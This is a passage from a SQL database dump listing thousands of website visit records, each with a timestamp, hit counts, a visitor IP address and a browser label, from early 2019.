'other'),(393073,1551385858,1,1,0,0,'54.36.150.42','other'),(393074,1551385896,1,1,0,0,'54.36.150.40','other'),(393075,1551385898,1,1,0,0,'54.36.148.81','other'),(393076,1551386170,1,1,0,0,'54.36.150.168','other'),(393077,1551386260,1,1,0,0,'66.249.64.122','chrome'),(393078,1551386301,1,1,0,0,'54.36.148.68','other'),(393079,1551386347,1,1,0,0,'8.29.198.26','other'),(393080,1551386427,2,2,0,0,'54.36.150.165','other'),(393081,1551386625,1,0,1,0,'51.77.52.160',''),(393082,1551386868,1,1,0,0,'216.244.66.241','other'),(393083,1551387304,1,1,0,0,'54.36.148.233','other'),(393084,1551387906,6,6,0,0,'138.68.180.18','chrome'),(393085,1551388048,1,1,0,0,'40.77.167.83','other'),(393086,1551388106,1,1,0,0,'8.29.198.26','other'),(393087,1551388196,1,1,0,0,'54.36.148.210','other'),(393088,1551388227,1,1,0,0,'54.36.148.201','other'),(393089,1551388614,1,1,0,0,'54.36.148.205','other'),(393090,1551388622,1,1,0,0,'54.36.150.122','other'),(393091,1551388667,1,1,0,0,'207.46.13.93','other'),(393092,1551388670,1,1,0,0,'216.244.66.241','other'),(393093,1551388990,1,1,0,0,'46.229.168.139','other'),(393094,1551389100,1,1,0,0,'54.36.150.112','other'),(393095,1551389341,1,1,0,0,'54.36.148.250','other'),(393096,1551389366,1,1,0,0,'54.36.150.100','other'),(393097,1551390151,1,1,0,0,'54.36.149.68','other'),(393098,1551390898,1,1,0,0,'54.36.148.147','other'),(393099,1551390955,1,1,0,0,'54.36.149.56','other'),(393100,1551390969,2,2,0,0,'207.46.13.93','other'),(393101,1551391183,1,1,0,0,'54.36.150.158','other'),(393102,1551391238,2,2,0,0,'40.77.167.83','other'),(393103,1551391538,1,1,0,0,'54.36.149.104','other'),(393104,1551391700,1,1,0,0,'54.36.150.62','other'),(393105,1551391847,1,1,0,0,'46.229.168.135','other'),(393106,1551392296,1,1,0,0,'54.36.148.23','other'),(393107,1551392568,1,1,0,0,'54.36.149.71','other'),(393108,1551392728,1,1,0,0,'109.87.76.22','firefox'),(393109,1551392735,1,1,0,0,'54.36.150.8','other'),(393110,1551392913,1,1,0,0,'40.77.167.205','other'),(393111,1551392972,1,1,0,0,'54.36.149.68','other'),(393112,1551393291,1,1,0,0,'54.36.150.182','other'),(393113,1551393667,1,1,0,0,'54.36.149.84','other'),(393114,1551394098,1,1,0,0,'54.36.148.21','other'),(393115,1551394161,2,2,0,0,'216.244.66.241','other'),(393116,1551394380,1,1,0,0,'54.36.148.60','other'),(393117,1551394584,1,1,0,0,'54.36.148.174','other'),(393118,1551394662,1,1,0,0,'157.55.39.196','other'),(393119,1551394762,1,1,0,0,'54.36.150.8','other'),(393120,1551395058,1,1,0,0,'54.36.150.125','other'),(393121,1551395132,1,1,0,0,'157.55.39.82','other'),(393122,1551395150,1,1,0,0,'37.9.113.103','other'),(393123,1551395206,1,1,0,0,'141.8.142.108','other'),(393124,1551395312,1,1,0,0,'46.229.168.136','other'),(393125,1551395345,1,1,0,0,'178.154.244.11','other'),(393126,1551395417,1,1,0,0,'37.9.113.20','other'),(393127,1551395602,1,1,0,0,'66.102.9.62','chrome'),(393128,1551395638,1,1,0,0,'54.36.150.171','other'),(393129,1551395723,1,1,0,0,'87.250.224.81','other'),(393130,1551395832,2,2,0,0,'157.55.39.196','other'),(393131,1551396004,1,1,0,0,'54.36.148.235','other'),(393132,1551396185,1,1,0,0,'54.36.149.87','other'),(393133,1551396266,1,1,0,0,'5.45.207.79','other'),(393134,1551396629,37,37,0,0,'144.76.81.229','other'),(393135,1551396839,1,1,0,0,'54.36.148.61','other'),(393136,1551397067,4,4,0,0,'216.244.66.241','other'),(393137,1551397068,7,7,0,0,'5.9.158.195','other'),(393138,1551397172,1,1,0,0,'8.29.198.26','other'),(393139,1551397310,1,1,0,0,'157.55.39.200','other'),(393140,1551397355,1,1,0,0,'54.36.149.62','other'),(393141,1551397458,1,1,0,0,'54.36.149.75','other'),(393142,1551397479,1,1,0,0,'5.45.207.19','other'),(393143,1551398085,1,1,0,0,'141.8.142.103','other'),(393144,1551398912,1,1,0,0,'54.36.149.38','other'),(393145,1551398929,1,1,0,0,'8.29.198.25','other'),(393146,1551398977,1,1,0,0,'54.36.150.32','other'),(393147,1551399446,1,1,0,0,'54.36.148.210','other'),(393148,1551399541,2,2,0,0,'5.45.207.79','other'),(393149,1551399821,1,1,0,0,'54.36.148.9','other'),(393150,1551400135,1,1,0,0,'216.244.66.241','other'),(393151,1551400201,1,1,0,0,'54.36.148.147','other'),(393152,1551400412,1,1,0,0,'54.36.148.94','other'),(393153,1551400435,1,1,0,0,'54.36.148.112','other'),(393154,1551400957,1,1,0,0,'66.249.64.122','chrome'),(393155,1551401000,1,1,0,0,'54.36.148.38','other'),(393156,1551401050,1,1,0,0,'54.36.149.85','other'),(393157,1551401422,1,1,0,0,'54.36.150.96','other'),(393158,1551402112,1,1,0,0,'54.185.246.125','other'),(393159,1551402254,1,1,0,0,'66.249.64.122','chrome'),(393160,1551402613,1,1,0,0,'46.229.168.146','other'),(393161,1551402949,1,1,0,0,'54.36.148.69','other'),(393162,1551403481,1,1,0,0,'54.36.149.49','other'),(393163,1551403519,1,1,0,0,'46.229.168.138','other'),(393164,1551403780,1,1,0,0,'54.36.148.166','other'),(393165,1551403979,1,1,0,0,'66.249.64.124','chrome'),(393166,1551403993,1,1,0,0,'54.36.150.50','other'),(393167,1551404199,1,1,0,0,'54.36.148.140','other'),(393168,1551404275,1,1,0,0,'54.36.150.73','other'),(393169,1551404359,1,1,0,0,'54.36.148.77','other'),(393170,1551404713,1,1,0,0,'54.36.150.145','other'),(393171,1551404736,1,1,0,0,'54.36.148.133','other'),(393172,1551404944,1,1,0,0,'54.36.148.161','other'),(393173,1551405051,1,1,0,0,'54.36.149.68','other'),(393174,1551405244,1,1,0,0,'54.36.149.23','other'),(393175,1551405320,1,1,0,0,'46.229.168.149','other'),(393176,1551405587,1,1,0,0,'54.36.150.136','other'),(393177,1551405858,1,1,0,0,'54.36.150.95','other'),(393178,1551405914,1,1,0,0,'54.36.148.136','other'),(393179,1551405938,1,1,0,0,'46.229.168.129','other'),(393180,1551405957,1,1,0,0,'54.36.149.68','other'),(393181,1551406009,1,1,0,0,'54.36.150.59','other'),(393182,1551406162,1,1,0,0,'66.249.64.126','chrome'),(393183,1551406265,1,1,0,0,'40.77.167.56','other'),(393184,1551406733,1,1,0,0,'54.36.149.62','other'),(393185,1551406769,1,1,0,0,'54.36.150.43','other'),(393186,1551406854,1,1,0,0,'5.188.210.65','chrome'),(393187,1551406946,1,1,0,0,'54.36.150.84','other'),(393188,1551407043,1,1,0,0,'54.36.149.61','other'),(393189,1551407758,1,1,0,0,'54.36.148.180','other'),(393190,1551407774,1,1,0,0,'178.154.244.11','other'),(393191,1551407868,1,1,0,0,'54.36.148.59','other'),(393192,1551408002,1,1,0,0,'8.29.198.27','other'),(393193,1551408217,2,2,0,0,'66.249.64.122','chrome'),(393194,1551408751,1,1,0,0,'54.36.148.105','other'),(393195,1551408785,1,1,0,0,'54.36.150.95','other'),(393196,1551408883,1,1,0,0,'54.36.150.128','other'),(393197,1551408940,1,1,0,0,'54.36.150.31','other'),(393198,1551408962,1,1,0,0,'46.229.168.151','other'),(393199,1551409193,1,1,0,0,'54.36.150.141','other'),(393200,1551409356,2,2,0,0,'34.222.81.10','chrome'),(393201,1551409407,1,1,0,0,'54.36.148.202','other'),(393202,1551409415,1,1,0,0,'54.36.149.53','other'),(393203,1551409760,1,1,0,0,'157.55.39.181','other'),(393204,1551409764,1,1,0,0,'8.29.198.25','other'),(393205,1551409968,2,2,0,0,'167.99.212.214','chrome'),(393206,1551410168,1,1,0,0,'54.36.149.93','other'),(393207,1551410366,1,1,0,0,'54.36.148.81','other'),(393208,1551410709,1,1,0,0,'66.249.64.124','chrome'),(393209,1551410720,1,1,0,0,'54.36.148.41','other'),(393210,1551411679,1,1,0,0,'54.36.149.104','other'),(393211,1551412072,1,1,0,0,'66.249.64.124','chrome'),(393212,1551412507,1,1,0,0,'54.36.148.90','other'),(393213,1551412929,1,1,0,0,'180.76.15.27','other'),(393214,1551413146,1,1,0,0,'40.77.167.137','other'),(393215,1551413481,1,1,0,0,'54.36.150.48','other'),(393216,1551413607,1,1,0,0,'54.36.149.42','other'),(393217,1551414096,1,1,0,0,'40.77.167.137','other'),(393218,1551414598,1,1,0,0,'54.36.148.173','other'),(393219,1551414774,1,1,0,0,'54.36.150.110','other'),(393220,1551415404,1,1,0,0,'54.36.149.49','other'),(393221,1551415494,1,1,0,0,'54.36.148.195','other'),(393222,1551415542,1,1,0,0,'216.244.66.241','other'),(393223,1551415550,1,1,0,0,'54.36.150.126','other'),(393224,1551415787,1,1,0,0,'5.188.210.53','chrome'),(393225,1551415947,1,1,0,0,'157.55.39.158','other'),(393226,1551416177,1,1,0,0,'54.36.150.188','other'),(393227,1551416254,1,1,0,0,'54.36.150.47','other'),(393228,1551416343,2,2,0,0,'66.249.64.124','chrome'),(393229,1551416769,1,1,0,0,'54.36.148.130','other'),(393230,1551417055,1,1,0,0,'54.36.149.79','other'),(393231,1551417108,1,1,0,0,'54.36.148.141','other'),(393232,1551417167,1,1,0,0,'54.36.148.221','other'),(393233,1551417170,1,1,0,0,'66.249.64.126','chrome'),(393234,1551417219,1,1,0,0,'157.55.39.158','other'),(393235,1551417519,1,1,0,0,'5.45.207.19','other'),(393236,1551417568,1,1,0,0,'66.249.64.122','chrome'),(393237,1551418081,1,1,0,0,'54.36.150.82','other'),(393238,1551418180,1,1,0,0,'54.36.149.71','other'),(393239,1551418622,2,2,0,0,'216.244.66.241','other'),(393240,1551418799,1,1,0,0,'54.36.150.104','other'),(393241,1551418830,1,1,0,0,'8.29.198.27','other'),(393242,1551418897,1,1,0,0,'54.36.149.23','other'),(393243,1551419161,1,1,0,0,'46.229.168.145','other'),(393244,1551419729,1,1,0,0,'209.17.97.82','other'),(393245,1551419736,3,3,0,0,'66.249.64.122','chrome'),(393246,1551419770,1,1,0,0,'54.36.150.55','other'),(393247,1551419796,1,1,0,0,'54.36.149.38','other'),(393248,1551419818,1,1,0,0,'54.36.150.134','other'),(393249,1551420225,1,1,0,0,'66.249.64.126','chrome'),(393250,1551420260,1,1,0,0,'157.55.39.169','other'),(393251,1551420262,1,1,0,0,'54.36.148.171','other'),(393252,1551420461,1,1,0,0,'54.36.150.166','other'),(393253,1551420486,1,1,0,0,'46.229.168.153','other'),(393254,1551420492,2,2,0,0,'66.249.64.124','chrome'),(393255,1551420593,1,1,0,0,'8.29.198.25','other'),(393256,1551421057,1,1,0,0,'91.196.178.94','chrome'),(393257,1551421236,1,1,0,0,'217.12.223.56','other'),(393258,1551421503,1,1,0,0,'54.36.148.216','other'),(393259,1551422101,1,1,0,0,'39.98.70.15','other'),(393260,1551422437,1,1,0,0,'92.113.4.30','firefox'),(393261,1551422870,3,3,0,0,'207.46.13.210','other'),(393262,1551422880,1,1,0,0,'207.46.13.201','other'),(393263,1551423127,1,1,0,0,'91.124.182.170','firefox'),(393264,1551423136,1,1,0,0,'54.36.148.210','other'),(393265,1551423293,1,1,0,0,'54.36.148.67','other'),(393266,1551423360,1,1,0,0,'54.36.148.148','other'),(393267,1551423828,1,1,0,0,'216.244.66.241','other'),(393268,1551423913,1,1,0,0,'46.229.168.146','other'),(393269,1551424374,1,1,0,0,'54.36.150.124','other'),(393270,1551424377,1,1,0,0,'91.196.179.61','chrome'),(393271,1551424582,1,1,0,0,'66.249.64.31','chrome'),(393272,1551425495,1,1,0,0,'91.196.178.169','chrome'),(393273,1551426104,1,1,0,0,'91.196.178.130','firefox'),(393274,1551426435,1,1,0,0,'54.36.148.132','other'),(393275,1551426438,1,1,0,0,'54.36.150.49','other'),(393276,1551426691,1,1,0,0,'66.249.64.29','chrome'),(393277,1551426896,1,1,0,0,'66.249.64.30','chrome'),(393278,1551427264,1,1,0,0,'54.36.148.47','other'),(393279,1551427341,1,1,0,0,'66.249.64.58','chrome'),(393280,1551427568,1,1,0,0,'46.229.168.138','other'),(393281,1551427700,1,1,0,0,'91.196.178.65','firefox'),(393282,1551428039,1,1,0,0,'54.36.148.167','other'),(393283,1551428322,1,1,0,0,'54.36.149.102','other'),(393284,1551428755,1,1,0,0,'46.164.144.86','firefox'),(393285,1551428869,2,2,0,0,'91.196.178.65','firefox'),(393286,1551429420,1,1,0,0,'54.36.148.243','other'),(393287,1551429442,1,1,0,0,'46.229.168.130','other'),(393288,1551429657,1,1,0,0,'8.29.198.25','other'),(393289,1551429672,1,1,0,0,'212.47.244.47','firefox'),(393290,1551429699,1,1,0,0,'54.36.150.47','other'),(393291,1551429852,1,1,0,0,'178.94.53.137','chrome'),(393292,1551430132,1,1,0,0,'66.249.64.31','chrome'),(393293,1551430341,1,1,0,0,'54.36.148.102','other'),(393294,1551430351,1,1,0,0,'207.46.13.201','other'),(393295,1551430449,1,1,0,0,'91.196.178.169','chrome'),(393296,1551430663,1,1,0,0,'46.229.168.146','other'),(393297,1551430838,1,1,0,0,'40.77.167.97','other'),(393298,1551431402,1,1,0,0,'37.52.22.197','chrome'),(393299,1551431428,1,1,0,0,'8.29.198.27','other'),(393300,1551431433,1,1,0,0,'54.36.149.45','other'),(393301,1551431658,1,1,0,0,'54.36.150.139','other'),(393302,1551431675,2,2,0,0,'216.244.66.241','other'),(393303,1551432074,1,1,0,0,'54.36.148.238','other'),(393304,1551432100,1,1,0,0,'54.36.148.8','other'),(393305,1551432189,1,1,0,0,'91.196.178.93','firefox'),(393306,1551432353,1,1,0,0,'37.52.22.197','chrome'),(393307,1551432434,1,1,0,0,'91.196.178.69','chrome'),(393308,1551432458,1,1,0,0,'66.249.64.58','chrome'),(393309,1551432494,1,1,0,0,'194.54.163.214','firefox'),(393310,1551432838,1,1,0,0,'54.36.148.4','other'),(393311,1551432978,1,1,0,0,'195.10.210.70','chrome'),(393312,1551433041,1,1,0,0,'54.36.150.18','other'),(393313,1551433228,1,1,0,0,'46.229.168.130','other'),(393314,1551433566,1,1,0,0,'62.210.111.66','firefox'),(393315,1551434118,1,1,0,0,'66.249.64.29','chrome'),(393316,1551434279,1,1,0,0,'54.36.150.29','other'),(393317,1551434413,1,1,0,0,'54.36.150.74','other'),(393318,1551434599,2,2,0,0,'216.244.66.241','other'),(393319,1551434732,1,1,0,0,'54.36.148.247','other'),(393320,1551434951,1,1,0,0,'40.77.167.97','other'),(393321,1551434999,1,1,0,0,'54.36.148.170','other'),(393322,1551435185,1,1,0,0,'46.229.168.153','other'),(393323,1551435474,2,2,0,0,'66.249.64.31','chrome'),(393324,1551435686,1,1,0,0,'54.36.149.21','other'),(393325,1551435872,1,1,0,0,'54.36.150.112','other'),(393326,1551436073,2,2,0,0,'91.196.179.134','chrome'),(393327,1551436111,1,1,0,0,'46.229.168.137','other'),(393328,1551436120,1,1,0,0,'46.229.168.151','other'),(393329,1551436272,1,1,0,0,'207.46.13.201','other'),(393330,1551436397,1,1,0,0,'91.196.178.94','chrome'),(393331,1551436717,1,1,0,0,'54.36.148.247','other'),(393332,1551436994,1,1,0,0,'54.36.150.59','other'),(393333,1551437377,1,1,0,0,'66.249.64.31','chrome'),(393334,1551437445,1,1,0,0,'54.36.148.68','other'),(393335,1551437759,1,1,0,0,'91.196.178.94','chrome'),(393336,1551437768,1,1,0,0,'5.45.207.79','other'),(393337,1551437773,1,1,0,0,'195.10.210.70','chrome'),(393338,1551437782,1,1,0,0,'195.88.158.180','chrome'),(393339,1551438162,1,1,0,0,'46.219.61.42','chrome'),(393340,1551438459,1,1,0,0,'54.36.148.35','other'),(393341,1551438668,1,1,0,0,'66.249.64.30','chrome'),(393342,1551439202,1,1,0,0,'54.36.149.76','other'),(393343,1551439359,1,1,0,0,'77.232.153.155','chrome'),(393344,1551439385,1,1,0,0,'157.55.39.81','other'),(393345,1551439440,1,1,0,0,'54.36.150.74','other'),(393346,1551439733,1,1,0,0,'216.244.66.241','other'),(393347,1551439884,1,1,0,0,'54.36.150.132','other'),(393348,1551440269,1,1,0,0,'180.76.15.26','other'),(393349,1551440487,1,1,0,0,'8.29.198.27','other'),(393350,1551440561,1,1,0,0,'54.36.149.27','other'),(393351,1551440564,1,1,0,0,'40.77.167.74','other'),(393352,1551440897,1,1,0,0,'40.77.167.27','other'),(393353,1551441072,1,1,0,0,'54.36.148.143','other'),(393354,1551441349,1,1,0,0,'54.36.148.208','other'),(393355,1551441496,1,1,0,0,'195.88.158.180','chrome'),(393356,1551441608,1,1,0,0,'54.36.150.124','other'),(393357,1551442131,1,1,0,0,'91.217.197.19','chrome'),(393358,1551442176,1,1,0,0,'157.55.39.81','other'),(393359,1551442260,1,1,0,0,'8.29.198.26','other'),(393360,1551442352,1,1,0,0,'54.36.149.36','other'),(393361,1551442520,1,1,0,0,'216.244.66.241','other'),(393362,1551442692,1,1,0,0,'54.36.148.208','other'),(393363,1551443411,1,1,0,0,'54.36.149.103','other'),(393364,1551443998,1,1,0,0,'91.196.178.94','chrome'),(393365,1551444130,1,1,0,0,'91.196.178.69','chrome'),(393366,1551444200,1,1,0,0,'54.36.149.5','other'),(393367,1551444219,1,1,0,0,'54.36.150.113','other'),(393368,1551444238,1,1,0,0,'66.249.64.29','chrome'),(393369,1551444240,1,1,0,0,'40.77.167.27','other'),(393370,1551444744,1,1,0,0,'54.36.149.96','other'),(393371,1551444773,1,1,0,0,'54.36.148.66','other'),(393372,1551444807,1,1,0,0,'216.244.66.241','other'),(393373,1551444929,1,1,0,0,'91.196.178.94','chrome'),(393374,1551444930,1,1,0,0,'54.36.148.128','other'),(393375,1551445376,1,1,0,0,'54.36.149.91','other'),(393376,1551445548,1,1,0,0,'46.229.168.140','other'),(393377,1551445608,1,1,0,0,'54.36.148.99','other'),(393378,1551445617,1,1,0,0,'40.77.167.155','other'),(393379,1551445898,1,1,0,0,'54.36.148.50','other'),(393380,1551445961,1,1,0,0,'54.36.149.81','other'),(393381,1551447025,1,1,0,0,'54.36.150.40','other'),(393382,1551447078,1,1,0,0,'54.36.149.51','other'),(393383,1551447208,1,1,0,0,'54.36.149.52','other'),(393384,1551447324,1,1,0,0,'40.77.167.27','other'),(393385,1551447384,2,2,0,0,'216.244.66.241','other'),(393386,1551447513,1,1,0,0,'91.196.178.68','chrome'),(393387,1551447969,1,1,0,0,'46.229.168.136','other'),(393388,1551448267,1,1,0,0,'212.90.63.71','chrome'),(393389,1551448466,1,1,0,0,'54.36.148.133','other'),(393390,1551448620,1,1,0,0,'178.137.17.253','chrome'),(393391,1551448673,1,1,0,0,'46.229.168.134','other'),(393392,1551448857,1,1,0,0,'54.36.150.183','other'),(393393,1551448928,1,1,0,0,'54.36.148.246','other'),(393394,1551449065,1,1,0,0,'40.77.167.74','other'),(393395,1551449639,1,1,0,0,'62.205.134.182','chrome'),(393396,1551449695,1,1,0,0,'54.36.149.39','other'),(393397,1551449739,1,1,0,0,'54.36.148.70','other'),(393398,1551450044,1,1,0,0,'216.244.66.241','other'),(393399,1551450128,1,1,0,0,'95.163.255.46','other'),(393400,1551450293,1,1,0,0,'66.249.64.31','chrome'),(393401,1551450375,1,1,0,0,'54.36.150.180','other'),(393402,1551450436,1,1,0,0,'54.36.149.66','other'),(393403,1551451016,1,1,0,0,'157.55.39.104','other'),(393404,1551451293,1,1,0,0,'95.163.255.47','other'),(393405,1551451316,1,1,0,0,'8.29.198.27','other'),(393406,1551451411,1,1,0,0,'46.229.168.148','other'),(393407,1551451498,1,1,0,0,'95.163.255.46','other'),(393408,1551451688,2,2,0,0,'95.163.255.42','other'),(393409,1551451877,1,1,0,0,'54.36.150.0','other'),(393410,1551452740,1,1,0,0,'54.36.150.48','other'),(393411,1551452883,1,1,0,0,'54.36.150.178','other'),(393412,1551453152,1,1,0,0,'46.229.168.137','other'),(393413,1551453161,2,2,0,0,'216.244.66.241','other'),(393414,1551453190,1,1,0,0,'8.29.198.25','other'),(393415,1551453245,1,1,0,0,'54.36.148.54','other'),(393416,1551453422,1,1,0,0,'54.36.148.110','other'),(393417,1551453639,1,1,0,0,'54.36.150.90','other'),(393418,1551454084,1,1,0,0,'54.36.148.159','other'),(393419,1551454270,1,1,0,0,'54.36.149.48','other'),(393420,1551454294,1,1,0,0,'54.36.148.95','other'),(393421,1551454540,2,2,0,0,'5.45.207.19','other'),(393422,1551454550,1,1,0,0,'37.9.113.20','other'),(393423,1551454729,1,1,0,0,'95.108.213.4','other'),(393424,1551454804,1,1,0,0,'207.46.13.155','other'),(393425,1551455002,1,1,0,0,'178.154.244.21','other'),(393426,1551455144,1,1,0,0,'54.36.149.69','other'),(393427,1551455437,1,1,0,0,'87.250.224.107','other'),(393428,1551455483,2,2,0,0,'157.55.39.209','other'),(393429,1551455531,1,1,0,0,'141.8.132.16','other'),(393430,1551455636,1,1,0,0,'54.36.148.246','other'),(393431,1551455727,1,1,0,0,'5.45.207.19','other'),(393432,1551455901,1,1,0,0,'216.244.66.241','other'),(393433,1551455972,1,1,0,0,'95.163.255.45','other'),(393434,1551456295,1,1,0,0,'95.108.181.54','other'),(393435,1551456453,1,1,0,0,'54.36.150.172','other'),(393436,1551456474,1,1,0,0,'178.154.244.11','other'),(393437,1551456500,1,1,0,0,'5.255.253.38','other'),(393438,1551456581,2,2,0,0,'141.8.142.38','other'),(393439,1551456611,1,1,0,0,'54.36.148.189','other'),(393440,1551456699,1,1,0,0,'54.36.148.199','other'),(393441,1551456764,1,1,0,0,'5.45.207.19','other'),(393442,1551457095,1,1,0,0,'37.9.113.103','other'),(393443,1551457187,1,1,0,0,'95.163.255.42','other'),(393444,1551457228,1,1,0,0,'87.250.224.65','other'),(393445,1551457317,1,1,0,0,'54.36.150.173','other'),(393446,1551457393,1,1,0,0,'95.163.255.44','other'),(393447,1551457480,1,1,0,0,'46.211.27.236','chrome'),(393448,1551457530,1,1,0,0,'95.108.213.4','other'),(393449,1551457535,1,1,0,0,'82.145.210.158','other'),(393450,1551457551,1,1,0,0,'95.163.255.43','other'),(393451,1551457555,1,1,0,0,'66.249.64.29','chrome'),(393452,1551457899,1,1,0,0,'66.249.64.60','chrome'),(393453,1551457954,1,1,0,0,'5.45.207.19','other'),(393454,1551458233,1,1,0,0,'54.36.149.89','other'),(393455,1551458292,1,1,0,0,'46.229.168.145','other'),(393456,1551458296,1,1,0,0,'54.36.150.93','other'),(393457,1551458338,1,1,0,0,'54.36.150.71','other'),(393458,1551458375,1,1,0,0,'46.229.168.140','other'),(393459,1551458602,1,1,0,0,'40.77.167.12','other'),(393460,1551458781,1,1,0,0,'54.36.150.72','other'),(393461,1551458926,1,1,0,0,'54.36.148.206','other'),(393462,1551459072,1,1,0,0,'104.248.72.141','chrome'),(393463,1551459225,1,1,0,0,'104.248.72.141','firefox'),(393464,1551459234,1,1,0,0,'157.55.39.104','other'),(393465,1551459354,4,4,0,0,'177.87.12.2','firefox'),(393466,1551459606,1,1,0,0,'54.36.149.28','other'),(393467,1551459916,1,1,0,0,'146.120.225.178','chrome'),(393468,1551460130,1,1,0,0,'60.191.38.77','firefox'),(393469,1551460217,1,1,0,0,'40.77.167.70','other'),(393470,1551460331,1,1,0,0,'40.77.167.92','other'),(393471,1551460588,1,1,0,0,'54.36.150.184','other'),(393472,1551460593,1,1,0,0,'87.250.224.65','other'),(393473,1551460966,1,1,0,0,'40.77.167.12','other'),(393474,1551461043,1,1,0,0,'104.214.50.28','chrome'),(393475,1551461045,1,1,0,0,'157.55.39.209','other'),(393476,1551461085,4,4,0,0,'216.244.66.241','other'),(393477,1551461522,1,1,0,0,'93.73.44.100','firefox'),(393478,1551461783,1,1,0,0,'46.33.49.91','chrome'),(393479,1551461920,1,1,0,0,'40.77.167.12','other'),(393480,1551462000,1,1,0,0,'54.36.148.129','other'),(393481,1551462344,1,1,0,0,'54.36.150.158','other'),(393482,1551462379,17,17,0,0,'144.76.119.201','other'),(393483,1551462561,1,1,0,0,'66.249.64.31','chrome'),(393484,1551462651,2,2,0,0,'95.163.255.48','other'),(393485,1551463057,1,1,0,0,'54.36.149.83','other'),(393486,1551463391,1,1,0,0,'40.77.167.92','other'),(393487,1551463400,1,1,0,0,'91.196.178.82','firefox'),(393488,1551463408,1,1,0,0,'54.36.149.27','other'),(393489,1551463609,1,1,0,0,'66.249.64.31','chrome'),(393490,1551463622,2,2,0,0,'66.249.64.29','chrome'),(393491,1551463820,1,1,0,0,'95.163.255.49','other'),(393492,1551463925,1,1,0,0,'54.36.150.94','other'),(393493,1551463958,1,1,0,0,'37.53.110.17','firefox'),(393494,1551463962,2,2,0,0,'95.163.255.46','other'),(393495,1551464100,1,1,0,0,'95.163.255.42','other'),(393496,1551464214,1,1,0,0,'54.36.149.90','other'),(393497,1551464517,1,1,0,0,'54.36.148.79','other'),(393498,1551464764,1,1,0,0,'91.196.178.132','firefox'),(393499,1551464782,2,2,0,0,'8.29.198.25','other'),(393500,1551465311,1,1,0,0,'54.36.148.198','other'),(393501,1551465458,5,5,0,0,'178.154.244.11','other'),(393502,1551465491,1,1,0,0,'54.36.148.152','other'),(393503,1551465878,1,1,0,0,'54.36.150.122','other'),(393504,1551465966,1,1,0,0,'37.9.113.148','other'),(393505,1551466030,1,1,0,0,'54.36.150.135','other'),(393506,1551466130,1,1,0,0,'87.250.224.47','other'),(393507,1551466198,1,1,0,0,'54.36.150.151','other'),(393508,1551466313,2,2,0,0,'95.108.213.4','other'),(393509,1551466593,1,1,0,0,'141.8.142.103','other'),(393510,1551466826,1,1,0,0,'157.55.39.209','other'),(393511,1551467148,1,1,0,0,'5.45.207.79','other'),(393512,1551467256,1,1,0,0,'54.36.149.32','other'),(393513,1551467271,1,1,0,0,'54.36.150.190','other'),(393514,1551467411,1,1,0,0,'40.77.167.70','other'),(393515,1551467479,1,1,0,0,'40.77.167.92','other'),(393516,1551467666,1,1,0,0,'66.249.64.31','chrome'),(393517,1551468234,1,1,0,0,'5.45.207.79','other'),(393518,1551468511,1,1,0,0,'95.163.255.48','other'),(393519,1551468962,1,1,0,0,'95.163.255.43','other'),(393520,1551469144,1,1,0,0,'54.36.148.7','other'),(393521,1551469155,2,2,0,0,'95.163.255.44','other'),(393522,1551469272,1,1,0,0,'54.36.148.182','other'),(393523,1551469328,1,1,0,0,'95.163.255.45','other'),(393524,1551469498,1,1,0,0,'54.36.148.121','other'),(393525,1551469601,1,1,0,0,'54.36.150.191','other'),(393526,1551469721,1,1,0,0,'54.36.149.26','other'),(393527,1551469815,2,2,0,0,'95.163.255.42','other'),(393528,1551469862,1,1,0,0,'46.229.168.150','other'),(393529,1551470077,1,1,0,0,'95.163.255.48','other'),(393530,1551470134,1,1,0,0,'54.36.148.75','other'),(393531,1551470141,1,1,0,0,'54.36.148.199','other'),(393532,1551470689,1,1,0,0,'66.249.64.62','chrome'),(393533,1551470746,1,1,0,0,'66.249.64.58','chrome'),(393534,1551471929,1,1,0,0,'54.36.149.16','other'),(393535,1551471963,1,1,0,0,'157.55.39.209','other'),(393536,1551472053,1,1,0,0,'54.36.150.182','other'),(393537,1551472563,1,1,0,0,'54.36.148.191','other'),(393538,1551472647,1,1,0,0,'54.36.150.155','other'),(393539,1551472709,1,1,0,0,'46.229.168.136','other'),(393540,1551472985,1,1,0,0,'54.36.150.41','other'),(393541,1551473115,1,1,0,0,'54.36.149.28','other'),(393542,1551473246,1,1,0,0,'54.36.148.215','other'),(393543,1551473464,1,1,0,0,'5.45.207.19','other'),(393544,1551473466,1,1,0,0,'178.154.244.11','other'),(393545,1551473552,1,1,0,0,'54.36.150.88','other'),(393546,1551473660,1,1,0,0,'40.77.167.37','other'),(393547,1551473960,1,1,0,0,'54.36.148.68','other'),(393548,1551473984,1,1,0,0,'46.229.168.144','other'),(393549,1551474037,1,1,0,0,'40.77.167.135','other'),(393550,1551474271,2,2,0,0,'216.244.66.241','other'),(393551,1551474294,1,1,0,0,'95.163.255.46','other'),(393552,1551474600,1,1,0,0,'95.163.255.45','other'),(393553,1551474767,2,2,0,0,'95.163.255.49','other'),(393554,1551474967,1,1,0,0,'95.163.255.43','other'),(393555,1551475088,1,1,0,0,'66.249.64.31','chrome'),(393556,1551475101,1,1,0,0,'54.36.148.33','other'),(393557,1551475161,1,1,0,0,'95.163.255.44','other'),(393558,1551475180,1,1,0,0,'54.36.150.68','other'),(393559,1551475331,2,2,0,0,'95.163.255.46','other'),(393560,1551475333,2,2,0,0,'95.163.255.47','other'),(393561,1551475429,1,1,0,0,'95.163.255.42','other'),(393562,1551475446,2,2,0,0,'37.9.113.148','other'),(393563,1551475602,1,1,0,0,'40.77.167.135','other'),(393564,1551475679,1,1,0,0,'54.36.150.14','other'),(393565,1551475708,1,1,0,0,'95.163.255.49','other'),(393566,1551475776,3,3,0,0,'178.154.244.11','other'),(393567,1551475838,1,1,0,0,'95.163.255.48','other'),(393568,1551476001,1,1,0,0,'5.45.207.19','other'),(393569,1551476013,1,1,0,0,'8.29.198.26','other'),(393570,1551476014,1,1,0,0,'178.154.171.24','other'),(393571,1551476066,1,1,0,0,'87.250.224.65','other'),(393572,1551476076,1,1,0,0,'46.229.168.135','other'),(393573,1551476114,1,1,0,0,'87.250.224.81','other'),(393574,1551476158,1,1,0,0,'8.29.198.25','other'),(393575,1551476616,2,2,0,0,'40.77.167.135','other'),(393576,1551476705,2,2,0,0,'216.244.66.241','other'),(393577,1551476725,1,1,0,0,'141.8.142.103','other'),(393578,1551476740,2,2,0,0,'178.154.244.11','other'),(393579,1551476767,1,1,0,0,'46.229.168.138','other'),(393580,1551476970,1,1,0,0,'40.77.167.52','other'),(393581,1551477190,1,1,0,0,'54.36.148.224','other'),(393582,1551477273,1,1,0,0,'54.36.150.61','other'),(393583,1551477777,5,5,0,0,'83.25.19.172','chrom